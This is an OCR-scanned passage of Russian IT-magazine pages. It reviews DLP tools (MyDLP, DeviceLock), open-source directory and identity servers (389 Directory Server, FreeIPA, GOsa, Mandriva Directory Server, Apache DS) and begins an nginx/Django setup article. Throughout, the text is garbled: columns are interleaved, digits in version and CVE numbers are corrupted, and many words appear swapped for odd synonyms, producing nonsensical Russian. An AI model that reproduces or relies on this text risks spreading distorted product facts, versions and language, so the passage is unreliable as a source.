"""''""""-"""~ ' -,

- ·- · ck-~-ol>old

...

~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

0

MyDLP

Просмотр снимков экрана во

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е красота из веб-nрокси [Squidl про фильтрации входящего равно ис­

DPI [Deep Packet

lпspectioп, капитальный разложение танцевальный шаг кетов! равным образом умеет предназначать прото­

х од мы щего веб-трафика , употребление во качестве контентнога

колы выше зависимости ото порта, поэтом у сис тематика позволяет несомненно

ф ильтра про

соз выкидывать политики интересах любого вида траф ика: веб-трафика,

помогите т а вление списков

Postfix, MS Exchange, интегрирование не без; Zimbгa; ACL бери ос нове IР -адресов равно шаблонов.

трафика соцсетей, файлового, почтов ого равно !М-трафика. Распозна­ ются вместе с инхронизации вместе с мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc равно iTuпes. В сегодняшний день миг на офици ­

альных со 3 сках н ет поддержки Р2Р равно

MyDLP умеет

обнар у живать равным образом отмыкать зашиф­

Функ ционально система, n остроенная получи и распишись

Skype.

Возможно эксплуатнуть специальный звено полно­

текстового п оиска

К кашаса е того ,

р ов анные файлы либо файлы, закрытые паролем [если поглощать ключ!.

Devicelock Seaгch Sегvег [DLSSI, какой

MyDLP,

состоит с четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся пользу кого

находит информацию на теневы х ко пия х равным образом журналах. Управление

nерехвата ТСР-соединений да является ведущий для того

производится около помощи гр у пповы х политзаключенный домена, поэто­

Написан нате E гlang равно

му клиенты непроизвольно п одх ватывают установки. Правил а

не без; да стеме, поддерживающей интерпретаторы.

создаются путем вычитчик

На из л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена облигация

Епtегргisе Manageг, со nо собная nолучать эмпирика

с любых LDАР-каталогов, во рента

Console

Python,

MyDLP.

можетбытьустановлен в какой приглянется

MyDLP Endp oint - aгeнт, водружаемый получи конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 02/64 - битные

тролирова т ь совершенно критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е помогите тояни е агентов. Такж е кли­

nечать, вторжение экрана, добыча nрав администратора да т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, который да какие

е нты могут губы навливаться со поуже nрек онфигурирова нны ми

исходняк использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые циклично nодключаются для Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки да сбрасывают лог. Написан бери РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 00.04 LTS. ОС клиенты: Windows ХР, Vista, 0 (x86/x64l.

никак не вызывает. Девиз

Бесnл~тная DLР-си от тематика [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl со отк рытым исходным

ко дом, включающая полоса функций в целях пр едотвращения прибыль

жайших nланах- POP/ IMAP, MSNMS/Jabbeг равным образом MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 07-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR равным образом др . ;

равно архивов-ZIР,

0z,

хоть небольшое видео руководство. П осле следовать n уска клиента на трее

Python-Magic , как

Ubuntul, символ VMwaгe да реnозиторий Ubuntu 00.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные деньги анализа, выправленный интерфейс, каран т ин, функцию

ар х ивирования да обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование да карантин!; файлов

в соответствии с МD5-хешу;

018

О реп nолностью относительно т ражает душа

невозможно. Проект предлагает директивный 050-образ [на базе

рассмотрение nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

распознавание М 0М Е-типа сообразно данным

Easy, Simple,

Документация проекта содержит десяток мануалов, yes т ь

nоявляется значок, сnрятать тот или другой со п омощью штатных средств

данны х:

LibгeOffi ce

настроек да журнала собы т ий исnоль­

Процесс настройки да подключения клиентов трудностей

Русификация: таки да нет (возможна собственными силами!. эту аббревиатуру вроде

Adobe Flex, пользу кого хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, ась?

DLP- сие

nрежде лишь инструмент, позво­

ляющий намного прибавить риски, наличествование ко т орого еще само

выдержка тек от та изо файловбинарных форматов;

в соответствии с себя дисциnлинирует сотрудников. Ожидать, зачем насаждение

отыскание исходного стих [C /Cн/C#/Java/A DA равно др.l; идентификация банковских счетов/кредитных карт, некоторых

такого склада системы гарантированно защитит через утечек , возникающи х

национальны х идентификационных комната ов;

захочет послать сиречь выплеснуть ценную информацию, симпатия безусловно

во результате умышленных действий, как и далеко не стоит. Если инсайдер

использование пользовательски х правил да регулярных выражений,

найдет дорога с целью этого, вследствие чего надлежит как и ис n ользовать целое

статистический расследование да байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 058/ 001 0


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , идеже во мире сыскать самые избранные продукты питания . Вы знаете, зачем можете встретить их рsщом , около маркой TASH


SYN/ACK

Сергуся gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA впредь до вер~:: 2.1.3 включи;ел

дано СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени автор следуе обновиться перед

,

0 04

'' '' '' ''

\ \

'

-

в рассуждении FгeeiPA

мы

исnользуется А~

аутентификаци

равно авторизац~~t для в решении относительно

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

малограмотный выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

определить

Sync. После установки

оnакета 089-dsдля 389DS конфигура~;ситить

пристало вслед за

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

на сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

020

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные маза

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

0,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 00 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста да

089

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна на работе

SERVER

Разработчики отмечают высок у ю отдача равно мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, полноте коптеть на Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 01, lrix, AIX, Windows равно OSF/1 . обществом подле спонсорской поддержке

0996

лета

Red Hat. Базой для Netscape Оiгес tогу

одной путы может сидеть накануне четырех

конфликтов, балансировкой н агрузки равно резервированием сервера . Поддерживаются работающие на режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег во

Active

Оiгесtогу

Win2k8 .

В нынешнее период программа по установленной форме предлагает репази­

тарий да пакеты в целях RHEL/Fedoгa [подходят равно про Ceпt05l. Кроме того, возможна набор на других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 01. Некоторые версии поддерживаюттакже Windows, lгix , AIX равным образом 05 F/ 0. Однако раскатывание равно последующая крыша

0егvег.

Он получил новое имя- F edoгa Оiгесtогу 0егvег- позднее того,

Red Hat. В 0009 году 389 Оiгесtогу 0егvег [389 до номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

08905 . В

равноправных мастер-серверов из автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

в качестве кого компетенция бери него во

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix равно сервисами

Сайт проекта:

послужил разрабатываемый от

е

году приобрела

план снова-здорово изменил заголовок получи и распишись

на << неофициальных>> системах требует с админа сейчас некоторой

ассоциировался со Fedoгa, что, по мнению мнению разработчиков, тормо­

подготовки.

зило развитие, во частности интеграцию на часть дистрибутивы.

Компоненты

На основе

08905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 0егvег [R H0 01 со техподдержкой 04/7. Возможности 089 05 включают полную поддержку пр отокола LDAPv3, 05 L/ТL5 - да 0А5 L­

08905

выпускаются согласно лицензии

GNU GPL,

а сер­

вер базируется получи ряде продуктов из другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, почто 089 05 является помогите т авной частью F гee iPA- централизованного решения про управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией что касается nользователях равно политиках да к аудита. Речь об

жете роль) со

этом продукте пойдет с грехом пополам ниже.

Active Оiгесtогу [при условии, что-нибудь получай КД Win2k3/2k8 установлен деталь Windows 0yncl, различение доступа впло ть поперед отдель н ых а три бутов [и мя, гр уппа, IP да т. д .l В качестве криптадвижка используется библиотечка N55 с Mozilla Pгoject. Конструктивно 08905 состоит с сервера каталогов [Саге Оiгесtогу 5егvег, СО51 равным образом сервера администрирования [Admin 0егvегl. Задача последнего- регулирование всеми доступными С О5 , на зачем пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, облик VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 0егvег [М О5 0 - простое во использо ­

лагается графическая ферма [389-coпsolel равным образом утилиты командной строки. В

Linux выступ устанавливается автопилотом [написана на Javal. Для управления из-под Win2k3/2k8 в сайте проекта сле­ дует скача ть блок Windows Console.

вании решение, nозволяющее рядом помощи наглядного интерфейса уnравлять учетными записями пользователей равным образом груnп, доступом

да сетевыми сервисам равно . П по части сути, сие ванька-встанька обная рубка по-над

FUSIONDIRECTORY Поскольку дорога для исходному коду

GOsa

вотум про управления, имеющее больше

Четко определен прейскурант поддерживаемых

удобные инструменты на разработки,

дистрибутивов (DeЬian, CeпtOS

так да развить документацию .

0/RHEL 0, Fedoгa 14/15, openSUSE 01.3/11 .4, SLES 011, и, главное,

приняли расшивка насчёт создании побольше

В октябре 0011-го вышла видоизменение FusionDiгec­

в целях каждого изо них создан репозиторий ,

открытого равным образом вполне поддерживаемого

toгy

сообществом фор ка интересах привлечения

началась ничуть недавно, в рассуждении каких -то особых

сторонних специалистов, а вдобавок обеспечения

функциональных отличиях через

пользу кого тех, кто именно никак не имеет взаимоотношения для компании

Gonicus GmbH,

был затруднен, разработчики

0.0.2, но,

приближенно в качестве кого усилие по-над nроектом

GOsa

доколь

обеспечивающий простую установку. Еще одно орден заключается в формально поддерживаемых веб­

условий с целью написания плагинов подина большее

апострофировать кого никак не nриходится. Документация , по мнению сути,

серверах. Разработчики nредлагают готовые

контингент приложений. Новый вариант

состоит изо испарения руководств, но, учитывая

конфигурационные файлы пользу кого

получил этноним FusioпDiгectoгy ( fusiondiгec­

агнация от

равно

GOsa,

получи и распишись стадии ознакомления

Lighttpd,

Apache2

возможна в свою очередь набор

toгy. org l . Разработчики обещали отнюдь не исключительно

вместе с FusionDiгectoгy дозволяется воспользоваться

сверху пgiпх , однако настройки придется основывать

разработать самое <<м ощное равным образом универсальное >>

документацию получай отеческий проект.

самостоятельно.

ХАКЕР

03/158/2012

021


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 0989288883 GIO : 0989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 0dc4c446 - 02eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA=, AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

08118469281326Z krbpa s swordexpiration : 08118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc=t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA позволяется

LDAP- OpenLDAP,

Консоль управления

пускать в ход ферма

хотя бы возможна равно совместная усилие не без;

08905.

Active

089 Directory Server

Diгectoгy да позволяющей централизованно распоряжаться аутен­

Функционально может выстуnать во качестве РОС !уровня Windows NT41, LDAP-cepвepa вместе с синхронизацией учетных заnисей равным образом nар а ­

тификацией пользователей, устанавли во ать политики дост упа равным образом ау­

лей, nолностью променять

проектов, таких на правах дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- сие сожительство неск ольких опенсорсных

КегЬегоs равно может состоять исnользован про организации однократ утнапиштим

08905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом подле финансовой подд ержке Red Hat, основан используемый во коммерческом дистриб утиве продукт IPA, какой-никакой Red Hat предо ста столица общественности летом 2008 года. Впервые адрес FгeeiPA п оявился на составе Fedoгa 0 lмай 0008гоl, впрочем нормальная синхронизирование вместе с Active Diгectoгy сверху оный

аутентификации 05501. Разграничени е по сту nа с целью объектов уста­

секунда до этого времени отнюдь не была реализована. На первых порах клиенты

навливается вnлоть до самого отдельных атрибутов: пользователь, гр уnпа,

могли устанавливать связь вручную, только сие было неудобно. В октябре

IР-адрес, миг равным образом т. д.

0009-го началась служба надо нов ой веткой

Active

на нее. Клиентскими ОС могут услуживать

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов равно ACL в 0amba, регулировать совмес тным достуnом, nечатью держи базе CUP5, доставкой nочты IPostfixl, настроить 0quid равным образом службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

равно Мае

Особенно nриятно, что такое? проблемы, преследовавшие компанию Mandгiva, отнюдь не затронули

MD5

да nродукт nостоянно развивается.

равно

0.0. Ее

финальная

разновидность была предо ста вл ена во конце марта 0011-го. День , во который был анонсирован релиз, запомнился многим пользователям

В последних версиях для указанным возможностям добавилось

наравне << F edoгa

у княжение учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В нынешнее период реализованы:

05 Test Da y»,

Linux

причастный особенно тестированию

совместную работу, централизованное оставление nубличных клю­

централизованное руководство учетными записями п ользо ват е­

чей-нибудь

лей, групп, компьютеро на равно сер ви сов;

Open5SH , аудит,

политики паролей да многое другое. Модульная

зодчество nозволяет причислять нужную функциональность другими словами

правление дост упом для приложениям, устано вка политический деятель танцевальный шаг ро­

помещать с интерфейса лишнее.

лей да настроек КегЬегоs, управле ние правилами

MD5 несложно

масштабируется, под­

держивая порядком тысяч заnисей в что до дин сер на ер. Неn осредстве нно на уп равления сервисами предназначен

Host Based Access Соntгоl-управление равным образом сохранение ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 0егvегl.

узел ММС

обмена

agent, отписанный возьми Pytho n равно да со nоль зую щий для да нными XM L-RPC. Агенты настраиваются рядом помощи

жуть nростого на исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может отобрать единственный изо двух режимов отображения: Noгmal другими словами Ехрегt. В различие ото

08905,

0UDO;

идентификация КегЬегоsдля пользователей да узлов;

Сеть, построенная не без; применением FгeeiPA , функционально мо­ жет являться членом изо трех типов систем : одного не ведь — не то нескольких серве ­

пакеты nредлагаются невыгодный лишь про «род­

ного » дистрибутива: переводу нет приватизированный репозиторий

Debian,

ров, клиентских машин равным образом компьютера администратора. По следний, по сути, представляет на вывеску всегдашний абонентный дескать сктоп вместе с кон­

сборки ради Cent05/RHEL/Fedoгa равным образом open5U5E, а в свой черед заготовленный

сольными утилитами чтобы удален ного уп равления FгeeiPA !кстати,

облик VMwaгe. Таким образом, серверную деление

истощить их совершенно неграмотный бесспорно - совершенно не запрещается быть

MD5

позволено отно ­

сительно бегло равным образом не принимая во внимание nроблем найти во каждый *niх-системе.

веб-интерфейсом, тот или иной написан возьми

Продукт включен во партия изделий nоставки Mandгiva Ent eгpгise 0егvег.

MD5

nредставляет на вывеску самое простое во установке да конфигури­

Ja val.

Чтобы убавить нагр узку получи канал, контрагент использует локаль­

ный кеш ILDB равно XM LI, получая с него настройки во волюм числе равно рядом

ровании решение, освещенное на нашем обзоре, всё-таки самос тоя­

отсутствии доступа ко серверу. На клиентской системе устанавли­

тельная производство получи других системах, вдобавок МЕ5, все требует

сильно подробна равно nозволяет разобраться в всех его нюансах.

вается старатель управления аутентификацией 0550 l5ystem 0ecuгity 5eгvices Daemonl . Клиентская деление реализована безграмотный всего-навсего для Red H at/Fedo гa да клонов, однако да пользу кого др у ги х ОС да платформ: AIX,

iid!I!IIЩ

батман ке т ов для того

Сайт проекта:

их

некоторых навы заговор до работе от

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние к L iпuх-систем среды, представляющей лицом альтернативу

022

open5U5E. Что интересно, надо сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l да обесnечением совместимости работают неудовлетворительно сотрудника Red Hat.

HP-UX,

0olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов равным образом уnравление ими, автоматично генерир уя равно nо­ лучая новоявленный свидетельство по мнению истечении срока образ действий известно г о. Опционально возможна слияние со DN5-сервером сверху базе

!нужен nлагин

BIND LDAP BIND вместе с динамическим обновлением сквозь

ХАКЕР

03/158/2012


Корпоративные рука

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

0 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs да

.

·d

J

~~

Linu x, Windows

равно Мае

05

Х , исходные

ADS держи любой Java . возможностей LDAP,

тексты nозволяют сосредоточить

Java, Change

системе , для того которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется вроде

реализованы хранимые процедуры , триггеры,

встраиваемое во часть Jаvа-nриложения

динамические объекты

решение, но ни одна душа безграмотный заnрещает

другое. Распространяется перед лицензией

эксплуатнуть его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

создавание

~

Foundation

apache . oгg ). Полностью наnисан нате

Winblnd

Authentic111tion Method:

во

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

равно КегЬегоs , возможна

Java

равным образом многое

воплощение поддержки любого протокола .

LDАР - браузер, браузер от х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты в целях установки

администрирования.

равно

DSML,

клиентские программы ради

Менеджер аутентификации на Fedora позволяет прибрать FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами равно группами компьюте­ ров компетенция подтверждаются близ п омо щ равно Ке гЬ е г оs keytab либо

ет уп равлять дисконт ны ми после п ис ями

сертификата.

телей равно групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной равно клиентской части по­

носитель уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

да

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет кроме особых проблем интегриро на ать FгeeiPA да какой угодно

равно т. д . Итиль зработка вед ется подина эгидой компании

продукт. В сегодняшний день эпоха политики ис п ользуются во томище числе

для от раиса использует

GOsa

п ользова­

на своих сервисах.

равно настройкам рабочего стола. По ка реализо ваны н е по сию пору функции

Все функции вын есе ны на плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию во соо твет­

упра вления политиками , аудита равно контроля, которые пл анируется

ствии со своими н ужак дами.

равно в целях хра нения под масть мет канал д ос т у жете ко локальным прилож ениям

В нынешнее срок реализо ван об паче

аннексировать на проект.

Н е т н астроек правил

SELinu x,

подина держки

централизованно г об управления ключами

Samba, Fгe eRA DIUS , SSH равным образом LVM, ОТРи многого

другого. Очевидный недоделка проду для та- упорядоченность на пер­ вую в отношении ч ередь получи и распишись производные об т

Red Hat дистриб ути ваш брат .

Устано скручивать

сервер н ую ч асть Fг ee iPA не возбраняется изо репозиториев F e d oгa,

K12LTSP

CentOS,

равно совмес тимы х не без; ними . Р азработчики сдела ли всё , дабы

упрости ть работа локализации на версии 0.0 [ис польз у.е. тся gettext и UTF8]. В каталоге ins tall / po нет переводу обложка гu.ро, во ко т ором nере ­ веде сверху чуть малая пай сообщений. Пр оект инициативно развивается, равно близ этом обнаруживаю т ся касательно шиб­

0.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 0011-3636].

00

плагинов, обеспе­

чиваю щ их отдел такими сервисам и, в духе

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, да серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом всегда ваша милость ш еуказан ны е nлагины отнюдь не обяза тельн в отношении д олжны мучиться получи и распишись одном сервере, неко­ торые изо них мож н что касается устано скручивать сверху отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся на гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

вместе с прописанными п равами дост упа ко объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит изо как , что до пр е д е ляющего явность , объектов [поль ­ зова т е л ей/гру пп] равным образом разреше н ий. Разрешения опре д е ляют однако

ieiN4

на озмож ны е д ейс тв ия: соз д а ни е, удочка л ение, сдвиг , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, изо исходных текстов- кто хочешь *nix. Пр оект

переписывание да т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

однозначный на нашем обзоре вариант вместе с локализо­

ванным интерфейсом у правления. Правда , локализован некто временно

далеко не полностью, н насчёт исnользова ни е

gettext

по части зволяе т близ необ хо ди­

мости учинить сие самостоятельно.

Поддерживает ся губы н овка во любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , около который-нибудь соз дан обособленный

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е давно от т у пны пакеты чтобы Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, в качестве кого правил о, разработчики малограмотный спешат их соби армия , отчего вер эти капелька запаздывают. Можно исполь ­ зовать первый встречный веб - сер вер, насчёт дн ако важность по части тдается

равным образом

nginx.

Apache2

Д окумен тация д ос т у пна ведь ль ко возьми английском равным образом н е п о­

спевает после развитием проекта, многие моменты отражены во н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, почто сугубо многофункцио­ USERS

что до --

0

нальным инструментом является

GOsa2.

Это урегулирование обесnечивает у руководство у ч етными вслед за n исями равным образом многочисленными се рвисам и, поддер живает усишко тан овку

во потому что льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й отбор зависит ото конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 058/ 0012

вслед дачи . :х:

023


SYN/ACK

Евген Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений для догадка невальна приходят такие названия, вроде

nginx, memcached, еассеlегаtог, hiphop равным образом им подобные . Фактически сие не блещущий новизной

коллекция чтобы любого высоконагруженного сайта, написанного со использованием РНР. Но аюшки? коли мы хотим выдавить всегда соки изо сайта на 121,

Django? ХАКЕР

03/158/ 0012

.


И из пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 0obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" со n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 08::п.лат не: сн ... аJt lнl ~- · ведь АО кон ца

T1ogedltems

n-1111 ..

до этого времени их адреса сквозь точку не без; запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

011ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет определять кеш в области нескольким memcachedcepвepaм на автоматическом режиме . Для сего хватит показать

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 0211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, автор сих строк собираемся зап у стить небывалый веб-проект и решили конструировать его со использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, что-то спирт красив, производителен да невероятно Pythoп, воеже максимально сгрузить программ иста. Благодаря

Вместо MySQL можно, да же, назначить PostgгeSQL. Django, а в свою очередь uWSGI да pythoп-memcached автор сих строк поставим с репо­

архитектуре модель-вид-контроллер [MVC) равным образом модульном у дизай­

зитария Pythoп .

дружелюбен для разработчикам. Djaпgo использует всю мощь языка

ну, так поглощать структуре, построенной изо обособленных кирпичиков, Оjапgо-приложения получи обалдайс просты на конструировании и сопровождении. Система беретка сверху себя

00% работы,

$ sudo easy_install django uwsgi python-memcached

посему описа­

ние данных, генерация алгоритма их обработки равно отображения пре­ вращается во тривиальную задачу, только и знает решаемую во изрядно

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого мы расскажу позже:

десятков строк стих [например, с целью создания простейшего сайта с полноценной веб-админкой полно обоссать всего делов ряд

строк) . И всё сие минуя уродливого SQL, скрытого ото программи не без; та за классами Pythoп, в основе которых да генерируется план базы данных.

Мы ожидаем, почто выгода короче обладать высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё соответственно стандартной схеме. Бэка­ пим плоский конфиг nginx:

посему нам нужно за единый вздох предположить весь возможные пути опти­

мизации . Перво-напер изумительный пишущий сии строки должны избрать легкий, порывистый ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

сподручный во настройке равно сопровождении веб-сервер. Это, знамо

же, пginx, какой просто-напросто далеко не имее т конкурентов согласно скорости

Создаем последний конфиг равно пишем на него следующее:

отдачи контента. Мы откажемся через стандартных конфигураций с касательно всякими громоздкими апачами сверху стороне бэк-энда да будем

эксплуатнуть пgiпх наравне ведущий веб-сервер [впоследствии такую схему не запрещается подумаешь прибавить от через дополнительных серве­

овраг да балансировщиков нагрузки). Второй шаг- намерение вопроса в рассуждении томище , что будут связаны nginx и Djaпgo . Понятно, зачем скорее всего делов воспользоваться интерфейс

WSGI, ремилитаризованный с открытыми глазами ради Python, однако наша сестра должны выбрать правильную реализацию сего интерфейса . Казалось бы, здесь вариант один- mod_wsgi изо комплекта пgiпх, впрочем получай занятие

связующего звена вяще годится бридж uWSGI [ pгojects.unblt . it/

uwsgi ), который-нибудь показывает куда как лучшую производительность при минимальных требованиях для оперативной памяти [пруфлинк

